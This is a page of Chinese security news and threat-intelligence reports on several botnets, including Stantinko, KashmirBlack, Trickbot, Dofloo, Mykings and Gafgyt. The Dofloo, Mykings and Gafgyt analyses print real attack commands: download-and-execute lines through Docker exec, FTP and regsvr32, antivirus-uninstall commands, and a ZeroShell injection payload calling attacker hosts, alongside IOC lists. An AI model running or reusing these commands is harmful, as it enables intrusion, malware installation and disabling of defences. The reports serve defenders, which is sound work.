标签: 僵尸网络

Stantinko 僵尸网络正在瞄准 Linux 服务器以隐藏代理

至少自2012年以来,一个广告软件和投币商僵尸网络以俄罗斯、乌克兰、白俄罗斯和哈萨克斯坦为目标,目前已将目光投向了Linux服务器。 Intezer的分析报告指出,该木马伪装成Linux服务器上常用的HTTPd程序,它是一个新版本恶意软件,被跟踪为Stantinko。 早在2017年,ESET的研究人员就详细描述了一个庞大的广告软件僵尸网络,它通过欺骗寻找盗版软件的用户下载伪装成torrents的恶意可执行文件,安装执行广告注入和点击欺诈的流氓浏览器扩展程序。该僵尸网络控制着50万台机器,以加密挖矿的形式从他们控制的计算机中获利。 尽管Stantinko传统上是一个Windows恶意软件,但他们存在针对Linux的扩展工具。ESET观察到一个Linux木马代理通过恶意二进制文件部署在受损服务器上。 Intezer的最新研究提供了对该Linux代理的全新见解,特别是同一恶意软件(v1.2)的较新版本(v2.17),称为“httpd”,其中一个恶意软件样本已于11月7日从俄罗斯上传到VirusTotal。 执行后,“httpd”将验证与恶意软件一起提供的“etc/pd.d/proxy.conf”中的配置文件,并通过创建套接字和侦听器以接受研究人员认为是其他受感染系统的连接。 来自受感染客户机的HTTP Post请求传递到受攻击者控制的服务器上,然后该服务器使用代理转发回客户端进行响应。 如果未受感染的客户端向受损服务器发送HTTP Get请求,则会发回HTTP 301重定向到配置文件中指定的预配置URL。 Intezer的研究人员指出,新版恶意软件只起到代理的作用,新变种与旧版本共享多个函数名,一些硬编码路径与之前的Stantinko活动有相似之处。 “Stantinko是最新一个针对Linux服务器的恶意软件,这种恶意软件与利用受损Linux服务器的攻击活动有很大联系。”         消息及封面来源:The Hacker News ;译者:芋泥啵啵奶茶。 本文由 HackerNews.cc 翻译整理。 转载请注明“转自 HackerNews.cc ” 

Gitspaste-12 新型蠕虫僵尸网络通过 GitHub 和 Pastebin 传播

Gitpaste-12是Juniper Threat Labs最近发现的一种新蠕虫,它使用GitHub和Pastebin来存储组件代码,并且至少提供12种不同的攻击模块。 目前,该恶意软件正在开发中,它的目标是基于Linux的x86服务器,以及基于Linux ARM和MIPS的物联网设备。   更多内容请至Seebug Paper  阅读全文:https://paper.seebug.org/1394/     消息来源:JUNIPER,封面来自网络,译者:芋泥啵啵奶茶。 本文由 HackerNews.cc 翻译整理。 转载请注明“转自 HackerNews.cc ” 并附上原文链接。

俄罗斯黑客因僵尸网络数据收集计划而入狱

俄罗斯网络犯罪分子因参与一个造成至少1亿美元经济损失的僵尸网络计划而被判入狱8年。 据悉,犯罪分子Aleksandr Brovko是“数个精英在线论坛的活跃成员,这些论坛旨在为讲俄语的网络犯罪分子收集和交换其犯罪工具和服务。”Brovko编写了能够解析来自僵尸网络来源的数据脚本,搜索了数据转储以盗取个人身份信息(PII)和帐户凭据。 美国司法部声称:“Brovko攻击了超过200,000台未经授权的个人识别信息或金融帐户访问设备。” 2007年到2019年,Brovko持续参与该网络攻击计划,并被美国高级地方法院TS Ellis III判处八年徒刑。     消息来源:zdnet;封面来自网络;译者:小江。 本文由 HackerNews.cc 翻译整理。 转载请注明“转自 HackerNews.cc ” 并附上原文链接。

KashmirBlack 僵尸网络劫持了数千个运行在主流 CMS 平台上的网站

该僵尸网络利用几十个已知的漏洞来攻击广泛使用的内容管理系统(CMS)。KashmirBlack活动于2019年11月开始,其目标是WordPress,Joomla!,PrestaShop,Magneto,Drupal,Vbulletin,OsCommerence,OpenCart和Yeager等流行的CMS平台。 Imperva的研究人员表示:“其精心设计的基础架构可以轻松地扩展和添加新的攻击或有效负载,并且使用复杂的方法来伪装自身,使其不被发现并保护自身运行。” 这家网络安全公司对僵尸网络进行了为期六个月的调查,结果显示,该复杂操作由一台命令控制(C2)服务器和60多个代理服务器管理,这些服务器与僵尸网络进行通信以发送新目标,从而扩大了规模通过暴力攻击和安装后门来访问僵尸网络。 KashmirBlack的主要目的是滥用受感染系统的资源进行Monero加密货币挖掘,并将网站的合法流量重定向到垃圾邮件页面。但是,它也被用来进行defacement攻击。 无论出于何种动机,他们利用PHPUnit RCE漏洞(CVE-2017-9841)用与C2服务器通信的下一阶段恶意有效载荷感染客户。 Imperva的研究人员表示,根据它在一次此类defacement中发现的攻击特征,他们认为僵尸网络是一个名叫Exect1337的黑客的作品,该黑客是印度尼西亚黑客团队PhantomGhost的成员。 KashmirBlack的基础架构很复杂,包括两个单独的存储库,一个用于托管漏洞利用程序和有效负载,另一个用于存储恶意脚本以与C2服务器通信。 僵尸程序本身要么被指定为“传播僵尸程序”(与C2通信以接收感染新受害者的命令的受害者服务器),要么被指定为“待定僵尸程序”(其在僵尸网络中的用途尚待确定)。 尽管使用CVE-2017-9841将受害者转变为传播中的僵尸程序,但成功利用CMS系统中的15种不同缺陷导致受害者站点成为僵尸网络中新的未确定的僵尸程序。KashmirBlack攻击者使用了一个单独的WebDAV文件上传漏洞来进行攻击。 但是,随着僵尸网络规模的扩大,越来越多的僵尸网络开始从存储库中获取有效负载,他们的基础架构已进行了调整,使其通过添加负载平衡器实体来变得更具可伸缩性,该实体返回新设置的冗余存储库之一的地址。 KashmirBlack的最新版本也许是最阴险的。上个月,研究人员发现僵尸网络使用Dropbox替代了其C2基础架构,滥用了云存储服务的API来获取攻击指令并从传播中的僵尸网络上载攻击报告。 Imperva说:“转移到Dropbox可使僵尸网络将合法的Web服务隐藏在非法犯罪活动中。” “这是伪装僵尸网络流量,确保C&C操作安全的又一步,而且最重要的是,我们很难将僵尸网络追溯到操作背后的黑客。”     消息来源:The Hacker News ;封面来自网络;译者:芋泥啵啵奶茶。 本文由 HackerNews.cc 翻译整理。 转载请注明“转自 HackerNews.cc ” 并附上原文链接。

Interplanetary Storm Golang 僵尸网络

Bitdefender的研究人员发现Interplanetary Storm Golang僵尸网络可以用作高度匿名的proxy-network-as-a-service和基于订阅的模型租用。攻击者精通使用Golang和开发实践,并且善于隐藏管理节点。Interplanetary Storm还有一个复杂的、模块化的设备,该设备用来寻找新目标、推送和同步新版本恶意软件,对被感染者执行任意命令并与C2服务器通信公开web API。 … 更多内容请至Seebug Paper 阅读全文:https://paper.seebug.org/1373/       消息与封面来源:bitdefender  ,译者:芋泥啵啵奶茶 本文由 HackerNews.cc 翻译整理。 转载请注明“转自 HackerNews.cc ” 并附上原文链接。

微软捣毁了臭名昭著的 Trickbot 勒索软件僵尸网络

微软今天宣布,它破坏了Trickbot僵尸网络,这是世界上最臭名昭著的传播勒索软件的僵尸网络之一。自2016年底以来,Trickbot已经感染了超过100万台设备。微软与世界各地的网络运营商合作,拿下了Trickbot的关键基础设施,这样恶意软件运营者将无法再利用这个基础设施来分发恶意软件或勒索软件。 Trickbot不是一个简单的恶意软件,任何免费的反病毒软件都可以检测到,它在受影响的设备中不断进化。 Trickbot是一个多阶段的恶意软件,通常由一个外壳、一个加载器和一个主恶意软件模块组成。外壳使用多个不断变化的模板,旨在通过产生独特的样本来逃避检测,即使主要的恶意软件代码保持不变。 希望了解更多有关勒索软件与僵尸网络的内幕,您可以在微软的相关博客中获取更多资料: https://blogs.microsoft.com/on-the-issues/2020/10/12/trickbot-ransomware-cyberthreat-us-elections/     (稿源:cnBeta,封面源自网络。)

Dofloo(AESDDoS)僵尸网络正批量扫描、攻击 Docker 容器

感谢腾讯御见威胁情报中心来稿! 原文链接:https://mp.weixin.qq.com/s/ceNfVRneGGIkbFOqItU11g  一、概述 腾讯安全威胁情报中心检测到Dofloo(AESDDoS)僵尸网络正批量扫描和攻击Docker容器。部分云主机上部署的Docker容器没有针对远程访问做安全认证,存在Remote API允许未授权使用漏洞且暴露在公网,导致黑客通过漏洞入侵并植入Dofloo僵尸网络木马。 云计算兴起后,服务器硬件扩展非常便利,软件服务部署成为了瓶颈,Docker作为开源的引擎可以轻松地为任何应用创建一个轻量级的、可移植的、自给自足的容器,因而逐渐得到广泛应用。 而开发者在部署Docker时未对相关服务进行正确合理的配置导致其容易成为黑客入侵的路径之一,之前已有H2Miner利用Docker漏洞进行入侵挖矿的案例被披露(https://mp.weixin.qq.com/s/iNq8SdTZ9IrttAoQYLJw5A)。此次Dofloo僵尸网络入侵系统后,会搜集系统敏感信息并加密上传,接收C&C服务器指令,执行各类DDoS攻击。 腾讯安全系列产品已支持检测Dofloo(AESDDoS)僵尸网络的最新变种,企业安全运维人员如果发现已经中招,可对照分析报告的详细内容,将攻击者下载安装的文件和启动项删除,再参考以下安全响应清单进行排查,修复Remote API允许未授权使用的漏洞,避免再次遭遇入侵。 具体响应清单如下: 应用 场景 安全产品 解决方案 威 胁 情 报 腾讯T-Sec 威胁情报云查服务 (SaaS) 1)Dofloo僵尸网络相关IOCs已入库。 各类安全产品可通过“威胁情报云查服务”提供的接口提升威胁识别能力。可参考:https://cloud.tencent.com/product/tics 腾讯T-Sec 高级威胁追溯系统 1)Dofloo僵尸网络相关信息和情报已支持检索。 网管可通过威胁追溯系统,分析日志,进行线索研判、追溯网络入侵源头。T-Sec高级威胁追溯系统的更多信息,可参考:https://cloud.tencent.com/product/atts 云原生安全 防护 云防火墙 (Cloud Firewall,CFW) 基于网络流量进行威胁检测与主动拦截,已支持: 1)Dofloo僵尸网络关联的IOCs已支持识别检测; 2)检测Docker未授权访问漏洞利用攻击。   有关云防火墙的更多信息,可参考: https://cloud.tencent.com/product/cfw 腾讯T-Sec  主机安全 (Cloud Workload Protection,CWP) 1)已支持查杀Dofloo僵尸网络相关木马程序; 2)已支持Docker Daemon 2375管理端口开启的风险项检测。 腾讯主机安全(云镜)提供云上终端的防毒杀毒、防入侵、漏洞管理、基线管理等。关于T-Sec主机安全的更多信息,可参考:https://cloud.tencent.com/product/cwp 腾讯T-Sec 安全运营中心 基于客户云端安全数据和腾讯安全大数据的云安全运营平台。已接入腾讯主机安全(云镜)、腾讯御知等产品数据导入,为客户提供漏洞情报、威胁发现、事件处置、基线合规、及泄漏监测、风险可视等能力。 关于腾讯T-Sec安全运营中心的更多信息,可参考:https://s.tencent.com/product/soc/index.html 非云企业安全防护 腾讯T-Sec 高级威胁检测系统 (腾讯御界) 1)已支持通过协议检测Dofloo僵尸网络与服务器的网络通信; 2)检测Docker未授权访问漏洞利用攻击; 3)检测DDoS攻击流量;   关于T-Sec高级威胁检测系统的更多信息,可参考: https://cloud.tencent.com/product/nta 二、样本分析 在此次攻击中,攻击者首先通过向端口2375(与Docker守护进程通信的默认端口)发送TCP SYN数据包对给定的IP范围进行批量扫描。确定开放端口的目标IP后,发送请求调用/containers/json接口获取正在运行中的容器列表,之后使用Docker EXEC命令执行以下shell访问公开主机中所有正在运行的容器并下载木马Linux2.7。 获取容器列表: 针对运行状态的容器利用Docker EXEC执行木马下载命令: wget -P /tmp/ http[:]//49.235.238.111:88/Linux2.7 被下载的Dofloo僵尸网络木马Linux2.7会连接到49.235.238.111:48080来发送和接收来自攻击者的远程shell命令。 Dofloo僵尸网络还会在从被感染系统窃取信息,包括操作系统版本,CPU型号、速度和类型。 通过将自身路径写入/etc/rc.local、/etc/rc.d/rc.local、/etc/init.d/boot.local文件中以添加为自启动项。 使用AES算法对窃取的系统信息和命令和控制(C&C)数据进行加密。 此Dofloo变种能够发起各种类型的DDoS攻击,包括DNS、SYN,LSYN,UDP,UDPS,TCP和CC Flood。 IOCs C&C 49.235.238.111:48080 175.24.123.205: 48080 IP 49.235.238.111 89.40.73.126 175.24.123.205 URL http[:]//49.235.238.111[:]88/Linux2.7 http[:]//49.235.238.111/Lov.sh http[:]//49.235.238.111/lix http[:]//49.235.238.111/Verto http[:]//49.235.238.111[:]88/NgYx http[:]//49.235.238.111/linux-arm http[:]//49.235.238.111/shre.sh http[:]//89.40.73.126[:]8080/Linux2.7 http[:]//89.40.73.126/linux2.6 http[:]//89.40.73.126[:]8080/linux-arm http[:]//89.40.73.126[:]8080/Linux2.6 http[:]//89.40.73.126[:]8080/YmY http[:]//89.40.73.126[:]8080/LTF http[:]//89.40.73.126[:]8080/NgYx http[:]//89.40.73.126[:]8080/Mar http[:]//89.40.73.126[:]8080/linux2.6 http[:]//89.40.73.126[:]8080/Flood http[:]//175.24.123.205:88/Fck MD5 Flood 0579a022802759f98bfdf08e7dd16768 Linux2.7 0b0f1684f6791d9f8c44a036aa85a2cc lix 9530e46caab834e1e66a108e15ea97ca linux-arm ca1f347447ddf7990ccd0d6744f3545d Linux 05f28784a0da0c1e406d98c02dc7d560 arm 34eeb9eaa65c4a062311a886dd0157f1 Fck df86da9e341c3a9822f30ac4eba11951 Lov.sh 83caa873cee081162c417eb8dec4a351 Rze.sh 48c910cd9a07404fbfb8bf52847e72c3 SHre.sh bb7cdf5707a857036cd41af4bafaed31 参考链接: https://www.trendmicro.com/en_us/research/19/f/aesddos-botnet-malware-infiltrates-containers-via-exposed-docker-apis.html https://github.com/SPuerBRead/Docker-Remote-API-Exploit/blob/master/dockerAPI_Exploit.py

Mykings 僵尸网络新变种通过 PcShare 远程控制,已感染超 5 万台电脑挖矿

感谢腾讯御见威胁情报中心来稿! 原文链接:https://mp.weixin.qq.com/s/wZvnq6gVnEdGSH6f6oG8MA   最新版Mykings会在被感染系统安装开源远程控制木马PcShare,对受害电脑进行远程控制。Mykings僵尸网络木马还会关闭Windows Defender、检测卸载常见杀毒软件;卸载竞品挖矿木马和旧版挖矿木马;下载“暗云”木马感染硬盘主引导记录(MBR)实现长期驻留;通过计划任务、添加启动项等实现开机自动运行等行为。 一、背景 腾讯安全威胁情报中心检测到Mykings挖矿僵尸网络变种木马,更新后的Mykings会在被感染系统安装开源远程控制木马PcShare,对受害电脑进行远程控制:可进行操作文件、服务、注册表、进程、窗口等多种资源,并且可以下载和执行指定的程序。 Mykings僵尸网络木马还会关闭Windows Defender、检测卸载常见杀毒软件;卸载竞品挖矿木马和旧版挖矿木马;下载“暗云”木马感染硬盘主引导记录(MBR)实现长期驻留;通过计划任务、添加启动项等实现开机自动运行等行为。 MyKings僵尸网络最早于2017年2月左右开始出现,该僵尸网络通过扫描互联网上 1433 及其他多个端口渗透进入受害者主机,然后传播包括DDoS、Proxy(代理服务)、RAT(远程控制木马)、Miner(挖矿木马)、暗云III在内的多种不同用途的恶意代码。由于MyKings僵尸网络主动扩散的能力较强,影响范围较广,对企业用户危害严重。根据门罗币钱包算力1000KH/s进行推测,Mykings僵尸网络目前已控制超过5万台电脑进行挖矿作业。 腾讯安全系列产品已支持检测、清除Mykings僵尸网络的最新变种,具体响应清单如下: 应用场景 安全产品 解决方案 威 胁 情 报 腾讯T-Sec 威胁情报云查服务 (SaaS) 1)Mykings僵尸网络相关IOCs已入库。 各类安全产品可通过“威胁情报云查服务”提供的接口提升威胁识别能力。可参考:https://cloud.tencent.com/product/tics 腾讯T-Sec 高级威胁追溯系统 1)Mykings僵尸网络相关信息和情报已支持检索。 网管可通过威胁追溯系统,分析日志,进行线索研判、追溯网络入侵源头。T-Sec高级威胁追溯系统的更多信息,可参考:https://cloud.tencent.com/product/atts 云原生安全 防护 云防火墙 (Cloud Firewall,CFW) 基于网络流量进行威胁检测与主动拦截,已支持: 1)    Mykings僵尸网络关联的IOCs已支持识别检测; 2)    通过协议特征检测主机挖矿行为; 3)    SQL Server弱口令爆破登陆行为检测; 有关云防火墙的更多信息,可参考: https://cloud.tencent.com/product/cfw 腾讯T-Sec  主机安全 (Cloud Workload Protection,CWP) 1)    已支持查杀Mykings僵尸网络相关木马程序; 2)    云主机SQL Server弱口令风险项检测; 腾讯主机安全(云镜)提供云上终端的防毒杀毒、防入侵、漏洞管理、基线管理等。关于T-Sec主机安全的更多信息,可参考:https://cloud.tencent.com/product/cwp 腾讯T-Sec 安全运营中心 基于客户云端安全数据和腾讯安全大数据的云安全运营平台。已接入腾讯主机安全(云镜)、腾讯御知等产品数据导入,为客户提供漏洞情报、威胁发现、事件处置、基线合规、及泄漏监测、风险可视等能力。 关于腾讯T-Sec安全运营中心的更多信息,可参考:https://s.tencent.com/product/soc/index.html 非云企业安全防护 腾讯T-Sec 高级威胁检测系统 (腾讯御界) 1)    已支持通过协议检测Mykings僵尸网络与服务器的网络通信; 2)    通过协议特征检测主机挖矿行为; 关于T-Sec高级威胁检测系统的更多信息,可参考: https://cloud.tencent.com/product/nta 腾讯T-Sec终端安全管理系统(御点) 1)可查杀Mykings僵尸网络入侵释放的木马程序; 腾讯御点提供企业终端的防毒杀毒、防入侵、漏洞管理、基线管理等能力,关于T-Sec终端安全管理系统的更多资料,可参考:https://s.tencent.com/product/yd/index.html 二、样本分析 mykings通过mssql爆破(1433端口)攻击windows服务器,爆破登陆成功后执行Powershell脚本power.txt。Power.txt首先关闭Windows Defender相关功能,然后下载kill.txt清除旧版挖矿程序。 Kill.txt根据进程名匹配旧版挖矿程序,其中标记为“1”代表清除对应的WMI启动项,列表中Mykings常用进程名包括: uihost64.exe、dhelper.exe、msinfo.exe、u.exe、lsmose.exe、lsmos.exe、lsmo.exe、csrw.exe、csrw.exe、lsmosee.exe、lsmma.exe、lsmm.exe、lsmmaa.exe、lsmma.exe、new.exe、upsupx.exe、lsma.exe、lsmab.exe、lsmaaa.exe、lsma30.exe、lsma31.exe 删除旧版WMI事件过滤器“fuckyoumm2_filter”、消费者“fuckyoumm2_consumer”,从而删除WMI启动项。 2.1持久化 Power.txt接着下载uninstall.txt执行,完成卸载杀软、删除旧版挖矿木马、以及通过安装Windows计划任务、RUN启动项、WMI启动项进行本地持久化操作。 1、 卸载指定杀毒软件; wmic.exe product where “name like ‘%Eset%'” call uninstall /nointeractive wmic.exe product where “name like ‘%%Kaspersky%%'” call uninstall /nointeractive wmic.exe product where “name like ‘%avast%'” call uninstall /nointeractive wmic.exe product where “name like ‘%avp%'” call uninstall /nointeractive wmic.exe product where “name like ‘%Security%'” call uninstall /nointeractive wmic.exe product where “name like ‘%AntiVirus%'” call uninstall /nointeractive wmic.exe product where “name like ‘%Norton Security%'” call uninstall /nointeractive cmd /c “C:\Progra 1\Malwarebytes\Anti-Malware\unins000.exe” /verysilent /suppressmsgboxes /norestart 2、安装计划任务“oka”启动新版挖矿木马lsma12.exe,杀死进程java.exe; schtasks /create /tn “oka” /tr “cmd /c start c:\windows\inf\aspnet\lsma12.exe -p” /ru “system” /sc onstart /F wmic.exe process where ExecutablePath=’c:\\windows\\java\\java.exe’ call Terminate 3、安装计划任务”Mysa”、”Mysa2″,在每次系统启动时执行命令,使用账号test密码1433登陆FTP服务器ftp[.]ftp0930[.]host下载木马a1.exe和s1.rar并执行; schtasks /create /tn “Mysa” /tr “cmd /c echo open ftp.ftp0930.host >s echo test>>s echo 1433>>s echo binary>>s echo get a1.exe c:\windows\update.exe>>s echo bye>>s ftp -s:s c:\windows\update.exe” /ru “system” /sc onstart /F schtasks /create /tn “Mysa2” /tr “cmd /c echo open ftp.ftp0930.host>ps echo test>>ps echo 1433>>ps echo get s1.rar c:\windows\help\lsmosee.exe>>ps echo bye>>ps ftp -s:ps c:\windows\help\lsmosee.exe” /ru “system” /sc onstart /F 4、设置拒绝“system”用户访问指定文件和路径; cacls c:\windows\java\java.exe /e /d system cacls c:\windows\temp\servtestdos.dll /e /d system cacls C:\WINDOWS\Fonts\cd /e /d system 5、安装RUN启动项“start”负责下载执行脚本v1.sct,同时删除旧启动项“start1”,删除旧计划任务“Mysa3”、“ok”、“Mysa1”、“my1”。 reg add “HKLM\Software\Microsoft\Windows\CurrentVersion\Run” /v “start” /d “regsvr32 /u /s /i:http[:]//js.down0116.info:280/v1.sct scrobj.dll” /f reg add “HKLM\Software\wow6432node\Microsoft\Windows\CurrentVersion\Run” /v “start” /d “regsvr32 /u /s /i:http[:]//js.down0116.info:280/v1.sct scrobj.dll” /f reg delete HKlm\Software\Microsoft\Windows\CurrentVersion\Run /v “start1” /f SCHTASKS /Delete /TN “Mysa3” /F SCHTASKS /Delete /TN “ok” /F SCHTASKS /Delete /TN “Mysa1” /F SCHTASKS /Delete /TN “my1” /F 6、继续删除旧版的名称为“coronav”(新冠)的WMI启动项,同时安装新版的“coronav”WMI启动项,在其中通过Powershell下载和执行以下脚本: http[:]//ruisgood.ru/power.txt http[:]//gamesoxalic.com/power.txt 或者通过regsvr32下载和执行脚本: http[:]//ruisgood.ru/s.txt http[:]//gamesoxalic.com/s.txt 7、安装WMI启动项“fuckamm3”、“fuckamm4”启动新版挖矿木马程序: 8、Download.txt负责下载门罗币挖矿程序、Mykings更新程序和安装“暗云”木马感染程序: 2.2自更新 Download.txt下载的ups.dat为自解压程序,解压后释放多个文件到temp目录下,执行竞品挖矿木马清除、挖矿木马下载和启动,以及安装启动项等更新操作。释放的文件包括: c:\windows\temp\ntuser.dat c:\windows\temp\upx.exe %temp%\c3.bat %temp%\excludes %temp%\n.vbs Download.txt 下载的“暗云”木马max.rar会感染MBR执行shellcode,从云端获取Payload并最终获取Mykings相关木马文件。下载Payload网络流量如下: 首先从C2服务器http[:]//95.214.9.95/pld/cmd.txt下载cmd.txt。 然后向服务器(http[:]//95.214.9.95/pld/login.aspx?uid=***&info=***)发送上线信息,参数包括设备标识号uid和info,其中info包括计算机名、出口IP、CPU型号、CPU数量、内存大小信息,info数据经过base64编码,服务器接收数据后返回“AcceptOK”。 2.3 PcShare远控木马 返回数据cmd.txt中指定下载的20200809.rar为PcShare开源远控木马,该木马在github上有多个版本https[:]//github.com/LiveMirror/pcshare。木马下载后被拷贝至: c:\windows\debug\item.dat,启动命令为: rundll32.exe c:\windows\debug\item.dat,ServiceMain aaaa。 PcShare可根据服务端指令执行以下多种远控功能,该木马源代码在多个共享平台可供下载,黑客可以随意下载和重新修改编译。 1.枚举、创建、重命名、删除文件和目录 2.枚举和终止进程 3.编辑注册表项和值 4.枚举和修改服务 5.枚举和控制窗口 6.执行二进制文件 7.从C&C或提供的URL下载其他文件 8.将文件上传到C&C 9.执行shell命令 10.显示消息框 11.重新启动或关闭系统 PcShare连接C2服务器:192.187.111.66:5566。 2.4挖矿 Download.txt从地址http[:]//ruisgood.ru/1201.rar下载得到XMRig挖矿程序,从地址http[:]//ruisgood.ru/config2.json下载得到挖矿配置文件,然后启动挖矿进程: c:\windows\inf\aspnet\lsma12.exe 挖矿时使用矿池:xmr-eu1.nanopool.org:14444 门罗币钱包: 4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQo6GYsXhWxuSrS7Uka 查询该钱包,已挖矿获得143个XMR,折合人民币8万余元。而其矿池算力平均为1000Kh/s(盈利100美元/天),可推算约5万台电脑被控制挖矿。 IOCs C&C 192.187.111.66:5566 95.214.9.95 Domain ruisgood.ru ftp.ftp0801.ru gamesoxalic.com ftp.ftp0930.host js.down0116.info js.mys2016.info wmi.1217bye.host js.5b6b7b.ru up.mykings.pw kriso.ru f321y.com down.f4321y.com IP 199.168.100.74 173.247.239.186 174.128.235.243 223.25.247.152 167.88.180.175 139.5.177.10 173.247.239.186 185.239.227.82 URL http[:]//ruisgood.ru/ups.dat http[:]//ruisgood.ru/power.txt http[:]//ruisgood.ru/1201.rar http[:]//ruisgood.ru/uninstall.txt http[:]//ruisgood.ru/max.rar http[:]//ruisgood.ru/config2.json http[:]//ruisgood.ru/s.txt http[:]//ruisgood.ru/upx.exe http[:]//ruisgood.ru/s.xsl http[:]//ruisgood.ru/download2.txt http[:]//ruisgood.ru/batpower.txt http[:]//ruisgood.ru/ups.dat http[:]//ruisgood.ru/download.txt http[:]//ruisgood.ru/kill.txt http[:]//ruisgood.ru/up.txt http[:]//ruisgood.ru/wmi.txt http[:]//ruisgood.ru/batpower.tx http[:]//ruisgood.ru/up2.txt http[:]//gamesoxalic.com/power.txt http[:]//gamesoxalic.com/s.txt ftp[:]//199.168.100.74/aa.exe ftp[:]//199.168.100.74/1.dat ftp[:]//ftp.ftp0801.ru/1.dat ftp[:]//ftp.ftp0801.ru/aa.exe ftp[:]//ftp.ftp0930.host/a1.exe ftp[:]//ftp.ftp0930.host/s1.rar http[:]//js.down0116.info:280/v1.sct http[:]//174.128.235.243/wmi.txt http[:]//174.128.235.243/upsupx2.exe http[:]//174.128.235.243/u.exe http[:]//199.168.100.74/20200809.rar http[:]//199.168.100.74:8074/1201.rar http[:]//173.247.239.186:9999/max.exe http[:]//173.247.239.186:9999/u.exe http[:]//185.239.227.82:8082/2.exe http[:]//wmi.1217bye.host/S.ps1 http[:]//95.214.9.95/pld/cmd.txt http[:]//223.25.247.152:8152/batpower.txt http[:]//167.88.180.175:8175/kill.txt http[:]//167.88.180.175:8175/uninstall.txt http[:]//139.5.177.10:280/psa.jpg http[:]//199.168.100.74/2.exe http[:]//199.168.100.74:8074/2.exe http[:]//173.247.239.186/2.exe http[:]//185.239.227.82:8082/2.exe http[:]//173.247.239.186:9999/2.exe http[:]//js.5b6b7b.ru/v.sct http[:]//js.5b6b7b.ru:280/v.sct http[:]//up.mykings.pw/update.txt http[:]//kriso.ru/java12.dat http[:]//js.ftp0930.host/helloworld.msi http[:]//f321y.com:8888/dhelper.dat http[:]//down.f4321y.com:8888/kill.html md5 20200809.rar dce4ac18798ea897cdc9e09e06b178be max.rar bc7fc83ce9762eb97dc28ed1b79a0a10 u.exe d9c32681d65c18d9955f5db42154a0f3 ups.dat d1f978c88023639d6325805eb562de8c upsupx2.exe b5cd8af63e35db23eb1c6a4eb8244c45 address.txt 83bdb3a6fb995788de262b22919524f1 cloud.txt 6b9b70f4e0c8885d12169045e906d698 cmd.txt 6def7a0c5707f24a912c79f6520ca86f kill.txt 1573ab993edc98decc09423fd82ec5ed micro f0129d85b17ee4d29ef52c63e0e548a4 power.txt 5670f0839333e4b160be05177601b40c uninstall.txt 6092899216610fea5c65e416b34c1777 update.txt 581a86fea2afeb9b9d6d04c9a8f0a5c1 wmi.txt 6afc95f60630a588a7826608c70a60c8 wpd.jpg bbae338b0cac5a2d169b8c535f33bfa0 batpower.txt 40160c782c2a41eed8d8eaf0c706050a up.txt 6c190a44db2118d9c07037d769e0a62d ups.txt f41a8a69361fccc13344493c04a4f0d8 s.ps1 966abd05b7ad1b0b89d2a846f8a5a8f2 testav.dat d4f7a3f44ae3f21863b1440219388a5b psa.jpg 9cb1c1a78ce3efe57eef5f128b43710a 门罗币钱包: 4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQo6GYsXhWxuSrS7Uka 参考链接: https://www.freebuf.com/articles/193260.html https://www.freebuf.com/articles/network/161286.html https://blogs.blackberry.com/en/2019/09/pcshare-backdoor-attacks-targeting-windows-users-with-fakenarrator-malware

警惕 Gafgyt 僵尸网络对国内 Linux 服务器及 IoT 设备的攻击

感谢腾讯御见威胁情报中心来稿! 原文链接:https://mp.weixin.qq.com/s/fUOracfMmKfj5RT2llMVpg   一、背景 腾讯安全威胁情报中心检测到有境外IP针对国内Linux服务器的远程命令注入攻击。黑客通过批量扫描80、5555、60001端口来发现易受攻击的Linux服务器、android设备以及监控摄像头设备并利用ZeroShell远程代码执行漏洞(CVE-2019-12725)、bash shell漏洞、JAWS Webserver未授权shell命令执行漏洞进行攻击,攻击成功后下载Gafgyt家族木马。 Gafgyt是一种流行的僵尸网络程序,被认为是Mirai的前身,其源代码在2015年初被部分泄露。Gafgyt主要通过telent弱口令以及命令注入漏洞等方式进行攻击传播,通过感染基于Linux的IoT设备(包括基于Linux系统的路由器、智能摄像头等设备)来发起DDoS攻击,攻击类型以UDP、TCP和HTTP攻击为主。   腾讯安全系列产品应对Gafgyt僵尸网络的响应清单: 应用 场景 安全产品 解决方案 威 胁 情 报 腾讯T-Sec 威胁情报云查服务 (SaaS) 1)Gafgyt僵尸网络相关IOCs已入库。 各类安全产品可通过“威胁情报云查服务”提供的接口提升威胁识别能力。可参考:https://cloud.tencent.com/product/tics 腾讯T-Sec 高级威胁追溯系统 1)Gafgyt僵尸网络相关信息和情报已支持检索。 网管可通过威胁追溯系统,分析日志,进行线索研判、追溯网络入侵源头。T-Sec高级威胁追溯系统的更多信息,可参考:https://cloud.tencent.com/product/atts 云原生安全 防护 云防火墙 (Cloud Firewall,CFW) 基于网络流量进行威胁检测与主动拦截,已支持: 1)   Gafgyt僵尸网络关联的IOCs已支持识别检测; 2)   检测利用Zeroshell漏洞的命令注入攻击; 有关云防火墙的更多信息,可参考: https://cloud.tencent.com/product/cfw 腾讯T-Sec  主机安全 (Cloud Workload Protection,CWP) 1)    已支持查杀Gafgyt僵尸网络相关木马程序; 2)    告警弱口令爆破行为; 腾讯主机安全(云镜)提供云上终端的防毒杀毒、防入侵、漏洞管理、基线管理等。关于T-Sec主机安全的更多信息,可参考:https://cloud.tencent.com/product/cwp 腾讯T-Sec 安全运营中心 基于客户云端安全数据和腾讯安全大数据的云安全运营平台。已接入腾讯主机安全(云镜)、腾讯御知等产品数据导入,为客户提供漏洞情报、威胁发现、事件处置、基线合规、及泄漏监测、风险可视等能力。 关于腾讯T-Sec安全运营中心的更多信息,可参考:https://s.tencent.com/product/soc/index.html 非云企业安全防护 腾讯T-Sec 高级威胁检测系统 (腾讯御界) 1)   已支持通过协议检测Gafgyt僵尸网络木马与服务器的网络通信; 关于T-Sec高级威胁检测系统的更多信息,可参考: https://cloud.tencent.com/product/nta 二、详细分析 腾讯安全专家在日常安全巡检过程中发现攻击线索,腾讯云防火墙检测到攻击来源52.224.202.238:43787,针对目标系统80端口的命令注入攻击。 该攻击的payload为: GET /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*”;cd /tmp;curl -O http[:]//5.206.227.228/zero;sh zero;” HTTP/1.0 